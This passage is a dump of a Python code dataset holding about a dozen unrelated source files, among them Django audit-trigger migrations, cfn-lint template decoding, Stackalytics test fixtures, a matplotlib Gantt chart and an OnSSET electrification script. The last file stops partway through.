id (stringlengths 2-8) | text (stringlengths 16-264k) | dataset_id (stringclasses: 1 value) |
---|---|---|
3298701
|
from datetime import datetime, timedelta
from enum import Enum, auto
STATUS_MESSAGE_TIMEOUT = timedelta(seconds=5)
class WorkerState(Enum):
"""
The state of a worker (i.e. a file-writer instance).
"""
IDLE = auto()
WRITING = auto()
UNKNOWN = auto()
UNAVAILABLE = auto()
class WorkerStatus(object):
"""
Contains general status information about a worker.
"""
def __init__(self, service_id: str):
self._last_update = datetime.now()
self._service_id = service_id
self._state = WorkerState.UNAVAILABLE
def __eq__(self, other_status: "WorkerStatus") -> bool:
if not isinstance(other_status, WorkerStatus):
    return NotImplemented  # defer to the other operand instead of raising
return (
self.service_id == other_status.service_id
and self.state == other_status.state
)
def update_status(self, new_status: "WorkerStatus"):
"""
Updates the status/state of this instance of the WorkerStatus class using another instance.
.. note:: The service identifier of both this instance and the other one must be identical.
:param new_status: The other instance of the WorkerStatus class.
"""
if new_status.service_id != self.service_id:
raise RuntimeError(
f"Service id of status update is not correct ({self.service_id} vs {new_status.service_id})"
)
self._state = new_status.state
self._last_update = new_status.last_update
def check_if_outdated(self, current_time: datetime):
"""
Given the current time, state and the time of the last update: Have we lost the connection?
:param current_time: The current time
"""
if (
self.state != WorkerState.UNAVAILABLE
and current_time - self.last_update > STATUS_MESSAGE_TIMEOUT
):
self._state = WorkerState.UNAVAILABLE
self._last_update = current_time
@property
def state(self) -> WorkerState:
"""
The current state of the worker.
"""
return self._state
@property
def service_id(self) -> str:
"""
The service identifier of the worker that this instance of the WorkerStatus class represents.
"""
return self._service_id
@property
def last_update(self) -> datetime:
"""
The local time stamp of the last update of the status of the file-writer instance that this instance of the
WorkerStatus class represents.
"""
return self._last_update
@state.setter
def state(self, new_state: WorkerState):
self._last_update = datetime.now()
self._state = new_state
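if __name__ == "__main__":
    # Hedged usage sketch, not part of the original module: walks the public API of
    # WorkerStatus with a made-up service id ("filewriter_01" is purely illustrative).
    status = WorkerStatus("filewriter_01")
    status.state = WorkerState.WRITING        # the setter also refreshes last_update
    update = WorkerStatus("filewriter_01")
    update.state = WorkerState.IDLE
    status.update_status(update)              # copies state and timestamp from the update
    # Pretend no further status message arrives: well past the timeout the worker is
    # marked UNAVAILABLE by check_if_outdated.
    status.check_if_outdated(datetime.now() + 2 * STATUS_MESSAGE_TIMEOUT)
    print(status.state)                       # WorkerState.UNAVAILABLE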
|
StarcoderdataPython
|
6453467
|
<filename>Vertical Sticks.py
# -*- coding: utf-8 -*-
"""
Problem Statement
Given an array of integers Y=[y1,y2,…,yn], we have n line segments, such that, the endpoints of ith segment are (i,0)
and (i,yi). Imagine that from the top of each segment a horizontal ray is shot to the left, and this ray stops when it
touches another segment or it hits the y-axis. We construct an array of n integers, [v1,v2,…,vn], where vi is equal to
length of ray shot from the top of segment i. We define V(y1,y2,…,yn)=v1+v2+…+vn.
For example, if we have Y=[3,2,5,3,3,4,1,2], then v1,v2,…,v8=[1,1,3,1,1,3,1,2], as shown in the picture below:
For each permutation p of [1,2,…,n], we can calculate V(yp1,yp2,…,ypn). If we choose a uniformly random permutation p of
[1,2,…,n], what is the expected value of V(yp1,yp2,…,ypn)?
"""
__author__ = 'Danyang'
class Solution(object):
def solve(self, cipher):
"""
approach this problem by independently calculating the expected value of vi for each stick
http://cs.stackexchange.com/questions/1076/how-to-approach-vertical-sticks-challenge
Start with a round table with n seats and k people seated at random: the gaps between
neighbours are identically distributed with mean n/k.
Straighten the table into a line by treating the y-axis as one extra blocker. A stick's ray is
stopped by any stick at least as tall or by the y-axis, so on a virtual circle of n+1 seats the
relevant points are the stick itself, the other sticks of at least its height, and the y-axis:
k+1 points in total, where k (computed below) counts the sticks of at least the current height
including the stick itself. The expected gap back to the previous point is therefore
(n+1)/(k+1), which is what the loop accumulates.
Complexity: O(N^2)
:param cipher: the cipher
"""
N, A = cipher
l = N + 1
E = 0
for cur in A:
k = 0
for a in A:
if a >= cur:
k += 1 # including itself
E += float(l) / (k + 1)
return "%.2f" % E
if __name__ == "__main__":
import sys
f = open("0.in", "r")
# f = sys.stdin
solution = Solution()
testcases = int(f.readline().strip())
for t in xrange(testcases):
# construct cipher
N = int(f.readline().strip())
A = map(int, f.readline().strip().split(' '))
cipher = N, A
# solve
s = "%s\n" % (solution.solve(cipher))
print s,
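# Hedged sanity-check helper, not part of the original submission: brute-forces the
# expected value of V over all permutations of a small Y so the closed form used in
# Solution.solve can be cross-checked, e.g. compare
#   _expected_v_brute_force([3, 2, 5, 3])  with  Solution().solve((4, [3, 2, 5, 3]))
def _expected_v_brute_force(Y):
    from itertools import permutations
    def V(y):
        # Sum of ray lengths: stick i is blocked by the nearest stick to its left of at
        # least its height, or by the y-axis.
        total = 0
        for i in range(len(y)):
            v = 1
            j = i - 1
            while j >= 0 and y[j] < y[i]:
                v += 1
                j -= 1
            total += v
        return total
    perms = list(permutations(Y))
    return sum(V(p) for p in perms) / float(len(perms))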
|
StarcoderdataPython
|
11202781
|
"""Module for running PyVVO. This module is run by the platform (see
platform_config.json). The program expects two arguments: simulation ID
and simulation request.
Relevant documentation from GridAPPS-D can be found `here
<https://gridappsd.readthedocs.io/en/latest/using_gridappsd/index.html#id7>`__.
Since the link I gave you will almost definitely break or be wrong at
some point, it's under "Using GridAPPS-D"/"Hosting Application" on the
GridAPPS-D `Read the Docs site
<https://gridappsd.readthedocs.io/en/latest/index.html>`__
"""
import argparse
try:
import simplejson as json
except ModuleNotFoundError:
import json
import logging
from pyvvo import app
# Setup log.
LOG = logging.getLogger(__name__)
def _main():
# Log and collect inputs.
LOG.info("Starting PyVVO.")
parser = argparse.ArgumentParser()
parser.add_argument("sim_id", help="Simulation ID")
parser.add_argument("request", help="Simulation request")
opts = parser.parse_args()
# Parse the simulation request. Not sure why the .replace is
# needed, but it was done that way in the sample application.
sim_request = json.loads(opts.request.replace("\'", ""))
LOG.info("Simulation ID and request received. Initializing application.")
app.main(sim_id=opts.sim_id, sim_request=sim_request)
if __name__ == '__main__':
_main()
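# Hedged usage sketch, not taken from the GridAPPS-D docs; the values are placeholders.
# The platform would invoke this module roughly as
#   python <this module> 123456 "{'simulation_config': {}}"
# where 123456 stands in for the simulation ID and the second argument for the (quoted)
# simulation request that _main() strips of single quotes before json.loads.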
|
StarcoderdataPython
|
12841390
|
from typing import Type
from django.db.migrations.operations.base import Operation
from django.db.models import Model
class AddAuditOperation(Operation):
reduces_to_sql = True
reversible = True
enabled = True
def __init__(self, model_name, audit_rows=True, audit_text=False, excluded=('created', 'modified')):
self._model_name = model_name
self._audit_text = audit_text
self._audit_rows = audit_rows
self._excluded = excluded
def state_forwards(self, app_label, state):
pass # no visible changes for Django schema
def database_forwards(
self, app_label, schema_editor, from_state, to_state,
):
model: Type[Model] = to_state.apps.get_model(app_label, self._model_name)
table = model._meta.db_table
with schema_editor.connection.cursor() as cursor:
cursor.execute('SELECT to_regclass(\'audit.logged_actions\')')
has_audit = cursor.fetchone()[0]
BOOLEANS = ("BOOLEAN 'f'", "BOOLEAN 't'")
if has_audit:
schema_editor.execute(
'SELECT audit.audit_table({})'.format(
', '.join(( # join parameters
f"'public.{table}'",
BOOLEANS[self._audit_rows],
BOOLEANS[self._audit_text],
"'{{ {} }}'".format(
','.join(map( # join as postgres array
lambda col: f'"{col}"',
map( # extract column names from field names
lambda f: model._meta.get_field(f).get_attname_column()[1],
self._excluded,
)
))
)
))
),
)
def database_backwards(
self, app_label, schema_editor, from_state, to_state,
):
model = to_state.apps.get_model(app_label, self._model_name)
table = model._meta.db_table
schema_editor.execute(
'DROP TRIGGER IF EXISTS audit_trigger_row ON {}'.format(table),
)
schema_editor.execute(
'DROP TRIGGER IF EXISTS audit_trigger_stm ON {}'.format(table),
)
def describe(self):
return 'Add audit triggers on model {}'.format(self._model_name)
class RemoveAuditOperation(AddAuditOperation):
enabled = False
def database_forwards(
self, app_label, schema_editor, from_state, to_state,
):
super().database_backwards(
app_label, schema_editor, from_state, to_state,
)
def database_backwards(
self, app_label, schema_editor, from_state, to_state,
):
super().database_forwards(
app_label, schema_editor, from_state, to_state,
)
def describe(self):
return 'Remove audit triggers on model {}'.format(self._model_name)
EnableAuditOperation = AddAuditOperation
DisableAuditOperation = RemoveAuditOperation
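# Hedged usage sketch; the app label, dependency and model name below are illustrative,
# not taken from any real project. A hand-written migration could wire the operation in
# like this:
#
#     from django.db import migrations
#
#     class Migration(migrations.Migration):
#         dependencies = [('shop', '0002_order')]
#         operations = [
#             AddAuditOperation('Order', audit_rows=True, audit_text=False,
#                               excluded=('created', 'modified')),
#         ]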
|
StarcoderdataPython
|
233677
|
<gh_stars>1-10
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NewPythonArgumentDictionary import NewPythonArgumentDictionary
from quocspyside2interface.gui.uiclasses.NewPythonArgumentUI import Ui_Form
class NewPythonArgument(QtWidgets.QWidget, Ui_Form):
"""Create the new python argument for the python script"""
def __init__(self, argument_index, parent=None, argument=None):
# Get the path to the *.ui file
# ui_file = os.path.join(os.getcwd(), GuiConstants.GUI_PATH, "NewPythonArgument.ui")
# Load it
super().__init__(parent)
# uic.loadUi(ui_file, self)
self.setupUi(self)
# Argument index
self.argument_index_name = str(argument_index)
# Dictionary
self.new_python_argument_dictionary = NewPythonArgumentDictionary(loaded_dictionary=argument)
# Connection
self.argument_name_edit_line.textChanged.connect(self.set_argument_name)
self.argument_type_combobox.currentIndexChanged.connect(self.set_argument_type)
self.argument_value_edit_line.textChanged.connect(self.set_argument_value)
# Initialization
self._initialization()
def set_argument_name(self, argument_name):
self.new_python_argument_dictionary.name = argument_name
def set_argument_value(self, argument_value):
self.new_python_argument_dictionary.value = argument_value
def set_argument_type(self, index):
self.new_python_argument_dictionary.type = self.argument_type_combobox.itemText(index)
def _initialization(self):
# Combobox initialization
type_list = ["string", "int", "float", "bool"]
for type_name in type_list:
self.argument_type_combobox.addItem(type_name)
self.argument_name_edit_line.setText(self.new_python_argument_dictionary.name)
self.argument_type_combobox.setCurrentIndex(type_list.index(self.new_python_argument_dictionary.type))  # restore the saved type selection
self.argument_value_edit_line.setText(self.new_python_argument_dictionary.value)
def get_dictionary(self):
return self.new_python_argument_dictionary.get_dictionary()
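# Hedged usage sketch, not part of the original module; it needs a display and the
# generated Ui_Form, and the argument index is arbitrary.
#
#     app = QtWidgets.QApplication([])
#     widget = NewPythonArgument(argument_index=0)
#     widget.show()
#     print(widget.get_dictionary())
#     app.exec_()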
|
StarcoderdataPython
|
5029845
|
"""
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
import sys
import logging
import six
try:
from json.decoder import JSONDecodeError
except ImportError:
JSONDecodeError = ValueError
from yaml.parser import ParserError, ScannerError
from yaml import YAMLError
from cfnlint.decode import cfn_yaml, cfn_json
from cfnlint.rules import Match, ParseError
LOGGER = logging.getLogger(__name__)
def decode(filename, ignore_bad_template):
"""
Decode filename into an object
"""
template = None
matches = []
try:
template = cfn_yaml.load(filename)
except IOError as e:
if e.errno == 2:
LOGGER.error('Template file not found: %s', filename)
matches.append(create_match_file_error(
filename, 'Template file not found: %s' % filename))
elif e.errno == 21:
LOGGER.error('Template references a directory, not a file: %s',
filename)
matches.append(create_match_file_error(
filename,
'Template references a directory, not a file: %s' % filename))
elif e.errno == 13:
LOGGER.error('Permission denied when accessing template file: %s',
filename)
matches.append(create_match_file_error(
filename,
'Permission denied when accessing template file: %s' % filename))
if matches:
return(None, matches)
except UnicodeDecodeError as err:
LOGGER.error('Cannot read file contents: %s', filename)
matches.append(create_match_file_error(
filename, 'Cannot read file contents: %s' % filename))
except cfn_yaml.CfnParseError as err:
err.match.Filename = filename
matches = [err.match]
except ParserError as err:
matches = [create_match_yaml_parser_error(err, filename)]
except ScannerError as err:
if err.problem in [
'found character \'\\t\' that cannot start any token',
'found unknown escape character']:
try:
template = cfn_json.load(filename)
except cfn_json.JSONDecodeError as json_err:
json_err.match.filename = filename
matches = [json_err.match]
except JSONDecodeError as json_err:
if hasattr(json_err, 'message'):
if json_err.message == 'No JSON object could be decoded': # pylint: disable=no-member
matches = [create_match_yaml_parser_error(err, filename)]
else:
matches = [create_match_json_parser_error(json_err, filename)]
if hasattr(json_err, 'msg'):
if json_err.msg == 'Expecting value': # pylint: disable=no-member
matches = [create_match_yaml_parser_error(err, filename)]
else:
matches = [create_match_json_parser_error(json_err, filename)]
except Exception as json_err: # pylint: disable=W0703
if ignore_bad_template:
LOGGER.info('Template %s is malformed: %s',
filename, err.problem)
LOGGER.info('Tried to parse %s as JSON but got error: %s',
filename, str(json_err))
else:
LOGGER.error(
'Template %s is malformed: %s', filename, err.problem)
LOGGER.error('Tried to parse %s as JSON but got error: %s',
filename, str(json_err))
return (None, [create_match_file_error(
filename,
'Tried to parse %s as JSON but got error: %s' % (
filename, str(json_err)))])
else:
matches = [create_match_yaml_parser_error(err, filename)]
except YAMLError as err:
matches = [create_match_file_error(filename, err)]
if not isinstance(template, dict) and not matches:
# Template isn't a dict which means nearly nothing will work
matches = [Match(1, 1, 1, 1, filename, ParseError(),
message='Template needs to be an object.')]
return (template, matches)
def create_match_yaml_parser_error(parser_error, filename):
"""Create a Match for a parser error"""
lineno = parser_error.problem_mark.line + 1
colno = parser_error.problem_mark.column + 1
msg = parser_error.problem
return Match(
lineno, colno, lineno, colno + 1, filename,
ParseError(), message=msg)
def create_match_file_error(filename, msg):
"""Create a Match for a parser error"""
return Match(
linenumber=1, columnnumber=1, linenumberend=1, columnnumberend=2,
filename=filename, rule=ParseError(), message=msg)
def create_match_json_parser_error(parser_error, filename):
"""Create a Match for a parser error"""
if sys.version_info[0] == 3:
lineno = parser_error.lineno
colno = parser_error.colno
msg = parser_error.msg
elif sys.version_info[0] == 2:
lineno = 1
colno = 1
msg = parser_error.message
return Match(
lineno, colno, lineno, colno + 1, filename, ParseError(), message=msg)
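# Hedged usage sketch, not part of cfn-lint; "template.yaml" is a placeholder path.
#
#     template, matches = decode('template.yaml', ignore_bad_template=False)
#     if matches:  # parse problems come back as Match objects
#         for match in matches:
#             LOGGER.error('%s', match)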
|
StarcoderdataPython
|
371817
|
import cpg_scpi
from time import sleep
def main():
cpg = cpg_scpi.CircuitPlayground()
cpg.test_ledDemo()
# cpg.test_led()
# value = cpg.acc()
# print(f'acc: {value}')
# value = cpg.light()
# print(f'light: {value}')
cpg.close()
print()
print(f'Closed connection to CPG. {cpg.is_open=}')
main()
|
StarcoderdataPython
|
5160669
|
<reponame>mvinyard/python-developer-kit
__module_name__ = "_dynamical_import_of_function_from_string.py"
__author__ = ", ".join(["<NAME>"])
__email__ = ", ".join(["<EMAIL>",])
# import packages #
# --------------- #
from importlib import import_module
def _dynamical_import_of_function_from_string(
package, module, function, function_parameters=None
):
"""
Import a specific function from an installed package, dynamically using a string.
Parameters:
----------
package
Name of the package
type: str
module
Name of the module in the package
type: str
function
Name of the function in the module within the package
type: str
function_parameters
Default: None
Returns:
--------
function <package.module.function>
Notes:
------
(1)
"""
package_module = ".".join([package, module])
module = import_module(name=package_module)
try:
# some functions need parameters; others require not having parameters
function = getattr(module, function)
except:
function = getattr(module, function)(function_parameters)
return function
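if __name__ == "__main__":
    # Hedged usage sketch, not part of the original module: dynamically imports
    # json.decoder.JSONDecoder, chosen only because it ships with the standard library.
    decoder_cls = _dynamical_import_of_function_from_string("json", "decoder", "JSONDecoder")
    print(decoder_cls)  # <class 'json.decoder.JSONDecoder'>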
|
StarcoderdataPython
|
396917
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import itertools
import json
import mock
from oslo_utils import uuidutils
import six
import testtools
from stackalytics.dashboard import web
from stackalytics.processor import runtime_storage
class TestAPI(testtools.TestCase):
def setUp(self):
super(TestAPI, self).setUp()
self.app = web.app.test_client()
@contextlib.contextmanager
def make_runtime_storage(data, *generators):
_add_generated_records(data, *generators)
runtime_storage_inst = TestStorage(data)
setattr(web.app, 'stackalytics_vault', None)
with mock.patch('stackalytics.processor.runtime_storage.'
'get_runtime_storage') as get_runtime_storage_mock:
get_runtime_storage_mock.return_value = runtime_storage_inst
try:
yield runtime_storage_inst
finally:
pass
def make_records(**kwargs):
GENERATORS = {
'commit': _generate_commits,
'mark': _generate_marks,
'review': _generate_review,
}
def generate_records():
for record_type in kwargs.get('record_type', []):
if record_type in GENERATORS.keys():
for values in algebraic_product(**kwargs):
record = next(GENERATORS[record_type]())
record.update(values)
yield record
return generate_records
def make_module(module_name):
return {'id': module_name,
'module_group_name': module_name,
'modules': [module_name],
'tag': 'module'}
class TestStorage(runtime_storage.RuntimeStorage):
def __init__(self, data):
super(TestStorage, self).__init__('test://')
self.data = data
def get_update(self, pid):
for record in self.get_all_records():
yield record
def get_by_key(self, key):
return self.data.get(key)
def set_by_key(self, key, value):
super(TestStorage, self).set_by_key(key, value)
def get_all_records(self):
for n in range(self.get_by_key('record:count') or 0):
record = self.get_by_key('record:%s' % n)
if record:
yield record
def _generate_commits():
commit = {
'commit_id': uuidutils.generate_uuid(),
'lines_added': 9, 'module': 'nova', 'record_type': 'commit',
'message': 'Closes bug 1212953\n\nChange-Id: '
'I33f0f37b6460dc494abf2520dc109c9893ace9e6\n',
'subject': 'Fixed affiliation of Edgar and Sumit', 'loc': 10,
'user_id': 'john_doe',
'primary_key': uuidutils.generate_uuid(),
'author_email': '<EMAIL>', 'company_name': 'IBM',
'lines_deleted': 1, 'week': 2275,
'blueprint_id': None, 'bug_id': u'1212953',
'files_changed': 1, 'author_name': u'<NAME>',
'date': 1376737923, 'launchpad_id': u'john_doe',
'branches': set([u'master']),
'change_id': u'I33f0f37b6460dc494abf2520dc109c9893ace9e6',
'release': u'icehouse'
}
yield commit
def _generate_marks():
mark = {
'launchpad_id': 'john_doe', 'week': 2294, 'user_id': 'john_doe',
'description': 'Approved', 'author_name': '<NAME>',
'author_email': '<EMAIL>',
'primary_key': uuidutils.generate_uuid() + 'Workflow',
'module': 'glance', 'patch': 2, 'record_type': 'mark',
'company_name': '*independent', 'branch': 'master',
'date': 1387860458, 'record_id': 37184, 'release': 'icehouse',
'value': 1, 'type': 'Workflow',
'review_id': uuidutils.generate_uuid()}
yield mark
def _generate_review():
yield {
'status': 'NEW', 'review_number': 6, 'number': '60721',
'module': 'glance', 'topic': 'bug/1258999', 'record_type': 'review',
'value': -2, 'open': True,
'id': uuidutils.generate_uuid(),
'subject': 'Adding missing copy_from policy from policy.json',
'user_id': 'john_doe',
'primary_key': '<KEY>',
'author_email': '<EMAIL>', 'company_name': '*independent',
'branch': 'master',
'launchpad_id': 'john_doe', 'lastUpdated': 1387865203,
'author_name': '<NAME>', 'date': 1386547707,
'url': 'https://review.openstack.org/60721',
'sortKey': '0029f92e0000ed31', 'project': 'openstack/glance',
'week': 2292, 'release': 'icehouse', 'updated_on': 1387865147
}
def _add_generated_records(data, *generators):
count = 0
for gen in generators:
for record in gen():
record['record_id'] = count
data['record:%s' % count] = record
count += 1
data['record:count'] = count
def algebraic_product(**kwargs):
position_to_key = {}
values = []
for key, value in six.iteritems(kwargs):
position_to_key[len(values)] = key
values.append(value)
for chain in itertools.product(*values):
result = {}
for position, key in six.iteritems(position_to_key):
result[key] = chain[position]
yield result
def load_json(api_response):
return json.loads(api_response.data.decode('utf8'))
|
StarcoderdataPython
|
11218810
|
<gh_stars>1-10
from output.models.ms_data.identity_constraint.id_z006_xsd.id_z006 import (
AType,
BType,
BsType,
CType,
CsType,
RType,
Root,
)
__all__ = [
"AType",
"BType",
"BsType",
"CType",
"CsType",
"RType",
"Root",
]
|
StarcoderdataPython
|
9639700
|
import os
import platform
from distutils.core import setup, Extension
virtualenv_path = os.environ.get('VIRTUAL_ENV')
# Materialize as lists so that .append below also works on Python 3.
include_dirs = list(filter(None, [os.environ.get('INCLUDE_DIRS')]))
library_dirs = list(filter(None, [os.environ.get('LIBRARY_DIRS')]))
if virtualenv_path:
include_dirs.append('%s/include' % virtualenv_path)
library_dirs.append('%s/lib' % virtualenv_path)
# platform.system() returns 'Darwin' on macOS; platform.platform() would never match exactly.
ld_lib_key = ('DYLD_LIBRARY_PATH' if platform.system() == 'Darwin'
              else 'LD_LIBRARY_PATH')
os.environ[ld_lib_key] = '%s/lib' % virtualenv_path
mod_http_head = Extension(
'mod_http_head', sources=['mod_http_head.c'],
include_dirs=include_dirs,
library_dirs=library_dirs,
)
setup(name='mod_http_head', version='1.0',
description='A demo package http_head greenified',
ext_modules=[mod_http_head])
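# Hedged usage sketch; the directories are placeholders and INCLUDE_DIRS/LIBRARY_DIRS are
# the optional environment overrides read above.
#
#     INCLUDE_DIRS=/usr/local/include LIBRARY_DIRS=/usr/local/lib \
#         python setup.py build_ext --inplace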
|
StarcoderdataPython
|
87498
|
<filename>projects/es.um.unosql.subtypes/python/src/charts/GanttChart.py
import numpy as np
import matplotlib.pyplot as pyplot
import matplotlib.font_manager as font_manager
from matplotlib.dates import WEEKLY,MONTHLY, DateFormatter, rrulewrapper, RRuleLocator
from .ChartData import ChartData
class GanttChart:
__chartData = None
def __init__(self, csvRoute):
self.__chartData = {}
try:
csvContent = open(csvRoute).readlines()[1:]
except IOError as ioerr:
    print(ioerr)
    csvContent = []  # fall back to no rows so the loop below does not hit a NameError
entityDict = {}
for line in csvContent:
entityName, varId, count, firstTimestamp, lastTimestamp = line.rstrip().split(',')
if firstTimestamp != "0" and lastTimestamp != "0":
entityDict.setdefault(entityName,[]).append({"entityName": entityName, "varId": varId, "count": count, "firstTimestamp": firstTimestamp, "lastTimestamp": lastTimestamp})
for key in entityDict:
self.__chartData[key] = ChartData()
self.__chartData[key].process(entityDict[key])
def showCharts(self):
for key in self.__chartData:
self.__showChart(self.__chartData[key])
def __showChart(self, chartData):
figure1 = pyplot.figure()
ax = figure1.add_subplot(111)
for i in range(len(chartData.getYLabels())):
startDate, endDate = chartData.getTaskDates()[chartData.getYLabels()[i]]
ax.barh((i*0.5)+0.5, endDate - startDate, left=startDate, height=0.3, align='center', edgecolor='lightblue', color='blue', alpha = 1)
iLen = len(chartData.getYLabels())
pos = np.arange(0.5, iLen * 0.5 + 0.5, 0.5)
locsy, labelsy = pyplot.yticks(pos, chartData.getYLabels())
pyplot.setp(labelsy, fontsize = 8)
ax.set_ylim(bottom = -0.1, top = iLen*0.5+0.5)
ax.grid(color = 'lightblue', linestyle = ':')
ax.xaxis_date()
ax.xaxis.set_major_locator(RRuleLocator(rrulewrapper(MONTHLY, interval=4)))
ax.xaxis.set_major_formatter(DateFormatter("%d-%b-%Y"))
pyplot.setp(ax.get_xticklabels(), rotation=30, fontsize=8)
font = font_manager.FontProperties(size='small')
#ax.legend(loc=1,prop=font)
ax.invert_yaxis()
figure1.autofmt_xdate()
# Works only on Windows.
# pyplot.get_current_fig_manager().window.state('zoomed')
pyplot.show()
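# Hedged usage sketch, not part of the original module; the CSV path is a placeholder.
# The file is expected to have a header row followed by lines of
# entityName,varId,count,firstTimestamp,lastTimestamp as parsed in __init__ above.
#
#     chart = GanttChart("entity_timestamps.csv")
#     chart.showCharts()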
|
StarcoderdataPython
|
11364865
|
# Pulls all the other functions together to make magic!
#
# Author: <NAME> Last modified by <NAME>
# Date: 26 November 2018
# Python version: 3.7
import os
from onsset import *
import pandas as pd
import tkinter as tk
from tkinter import filedialog, messagebox
root = tk.Tk()
root.withdraw()
root.attributes("-topmost", True)
messagebox.showinfo('OnSSET', 'Open the specs file')
specs_path = filedialog.askopenfilename()
specs = pd.read_excel(specs_path, index_col=0)
countries = str(input('countries: ')).split()
countries = specs.index.tolist() if 'all' in countries else countries
choice = int(input('Enter 1 to split, 2 to prepare the inputs, 3 to run a scenario: '))
if choice == 1:
messagebox.showinfo('OnSSET', 'Open the csv file with GIS data')
settlements_csv = filedialog.askopenfilename()
messagebox.showinfo('OnSSET', 'Select the folder to save split countries')
base_dir = filedialog.asksaveasfilename()
print('\n --- Splitting --- \n')
df = pd.read_csv(settlements_csv)
for country in countries:
print(country)
df.loc[df[SET_COUNTRY] == country].to_csv(base_dir + '.csv', index=False)
elif choice == 2:
messagebox.showinfo('OnSSET', 'Open the file containing separated countries')
base_dir = filedialog.askopenfilename()
messagebox.showinfo('OnSSET', 'Browse to result folder and name the calibrated file')
output_dir = filedialog.asksaveasfilename()
print('\n --- Prepping --- \n')
for country in countries:
print(country)
settlements_in_csv = base_dir # os.path.join(base_dir, '{}.csv'.format(country))
settlements_out_csv = output_dir + '.csv' # os.path.join(output_dir, '{}.csv'.format(country))
onsseter = SettlementProcessor(settlements_in_csv)
onsseter.condition_df(country)
onsseter.grid_penalties()
onsseter.calc_wind_cfs()
pop_actual = specs.loc[country, SPE_POP]
pop_future = specs.loc[country, SPE_POP_FUTURE]
urban_current = specs.loc[country, SPE_URBAN]
urban_future = specs.loc[country, SPE_URBAN_FUTURE]
urban_cutoff = specs.loc[country, SPE_URBAN_CUTOFF]
start_year = int(specs.loc[country, SPE_START_YEAR])
end_year = int(specs.loc[country, SPE_END_YEAR])
time_step = int(specs.loc[country, SPE_TIMESTEP])
elec_actual = specs.loc[country, SPE_ELEC]
pop_cutoff = specs.loc[country, SPE_POP_CUTOFF1]
min_night_lights = specs.loc[country, SPE_MIN_NIGHT_LIGHTS]
max_grid_dist = specs.loc[country, SPE_MAX_GRID_DIST]
max_road_dist = specs.loc[country, SPE_MAX_ROAD_DIST]
pop_tot = specs.loc[country, SPE_POP]
pop_cutoff2 = specs.loc[country, SPE_POP_CUTOFF2]
dist_to_trans = specs.loc[country, SPE_DIST_TO_TRANS]
urban_cutoff, urban_modelled = onsseter.calibrate_pop_and_urban(pop_actual, pop_future, urban_current,
urban_future, urban_cutoff, start_year, end_year, time_step)
min_night_lights, dist_to_trans, max_grid_dist, max_road_dist, elec_modelled, pop_cutoff, pop_cutoff2, rural_elec_ratio, urban_elec_ratio = \
onsseter.elec_current_and_future(elec_actual, pop_cutoff, dist_to_trans, min_night_lights, max_grid_dist,
max_road_dist, pop_tot, pop_cutoff2, start_year)
onsseter.grid_reach_estimate(start_year, gridspeed=9999)
specs.loc[country, SPE_URBAN_MODELLED] = urban_modelled
specs.loc[country, SPE_URBAN_CUTOFF] = urban_cutoff
specs.loc[country, SPE_MIN_NIGHT_LIGHTS] = min_night_lights
specs.loc[country, SPE_MAX_GRID_DIST] = max_grid_dist
specs.loc[country, SPE_MAX_ROAD_DIST] = max_road_dist
specs.loc[country, SPE_ELEC_MODELLED] = elec_modelled
specs.loc[country, SPE_POP_CUTOFF1] = pop_cutoff
specs.loc[country, SPE_POP_CUTOFF2] = pop_cutoff2
specs.loc[country, 'rural_elec_ratio'] = rural_elec_ratio
specs.loc[country, 'urban_elec_ratio'] = urban_elec_ratio
try:
specs.to_excel(specs_path)
except ValueError:
specs.to_excel(specs_path + '.xlsx')
onsseter.df.to_csv(settlements_out_csv, index=False)
elif choice == 3:
# wb_tiers_all = {1: 7.738, 2: 43.8, 3: 160.6, 4: 423.4, 5: 598.6}
# print("""\nWorld Bank Tiers of Electricity Access
# 1: {} kWh/person/year
# 2: {} kWh/person/year
# 3: {} kWh/person/year
# 4: {} kWh/person/year
# 5: {} kWh/person/year""".format(wb_tiers_all[1], wb_tiers_all[2], wb_tiers_all[3],
# wb_tiers_all[4], wb_tiers_all[5]))
# wb_tier_urban = int(input('Enter the tier number for urban: '))
# wb_tier_rural = int(input('Enter the tier number for rural: '))
diesel_high = True if 'y' in input('Use high diesel value? <y/n> ') else False
diesel_tag = 'high' if diesel_high else 'low'
#do_combine = True if 'y' in input('Combine countries into a single file? <y/n> ') else False
messagebox.showinfo('OnSSET', 'Open the csv file with calibrated GIS data')
base_dir = filedialog.askopenfilename()
messagebox.showinfo('OnSSET', 'Browse to result folder and name the scenario to save outputs')
output_dir = filedialog.asksaveasfilename()
print('\n --- Running scenario --- \n')
for country in countries:
# create country_specs here
print(' --- {} --- {} --- '.format(country, diesel_tag))
settlements_in_csv = base_dir # os.path.join(base_dir, '{}.csv'.format(country))
settlements_out_csv = output_dir + '.csv' # os.path.join(output_dir, '{}_{}_{}.csv'.format(country, wb_tier_urban, diesel_tag))
summary_csv = output_dir + 'summary.csv'
onsseter = SettlementProcessor(settlements_in_csv)
start_year = specs[SPE_START_YEAR][country]
end_year = specs[SPE_END_YEAR][country]
time_step = specs[SPE_TIMESTEP][country]
diesel_price = specs[SPE_DIESEL_PRICE_HIGH][country] if diesel_high else specs[SPE_DIESEL_PRICE_LOW][country]
grid_price = specs[SPE_GRID_PRICE][country]
existing_grid_cost_ratio = specs[SPE_EXISTING_GRID_COST_RATIO][country]
num_people_per_hh_rural = float(specs[SPE_NUM_PEOPLE_PER_HH_RURAL][country])
num_people_per_hh_urban = float(specs[SPE_NUM_PEOPLE_PER_HH_URBAN][country])
